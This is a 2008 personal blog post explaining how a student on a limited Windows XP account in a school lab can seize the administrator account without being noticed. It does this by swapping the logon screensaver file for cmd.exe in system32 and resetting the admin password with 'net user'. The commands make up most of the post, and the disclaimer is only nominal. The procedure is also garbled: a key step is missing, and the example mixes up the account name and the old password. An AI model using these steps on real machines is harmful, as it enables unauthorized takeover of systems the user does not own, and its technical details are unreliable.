The Power of Information Technology

February 19, 2008

Windows Hack: Getting the administrator password and account when you are in a limited account

Have you ever been into a pc with a limited account only? Like here in our school laboratory, students can only use the limited user account with lesser privileges and lesser control of the pc. This sometimes restricts students from installing programs or software and it is annoying. This disrupts our freedom to explore and to test out new stuff. Because of this, I wanted to share a way on how to hack into the administrator password of the pc without being noticed. This will also prove that Windows XP itself is not fully secured and can contain leaks from its system. Please take note that his windows hack is intended only for learning and helping purposes only and should not be used to destroy the system or acquire limited use and legally protected data. This procedure works best when you are in a limited account.
Here are the types:
First is open up a DOS prompt.

Enter the following commands:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

The commands told the computer to backup the command program and screensaver file and it edits the settings.

After that, enter the following command/s:

net user <admin account name here> password

For example, the Administrator password is “sHaNs”  and you want to change the password to “invoker”. All you have to do is type this code.

net user sHaNs invoker

Now you have just changed the password of the admin and you are now in.

Have fun and goodluck.






















Get free blog up and running in minutes with Blogsome
Theme designed by Minz Meyer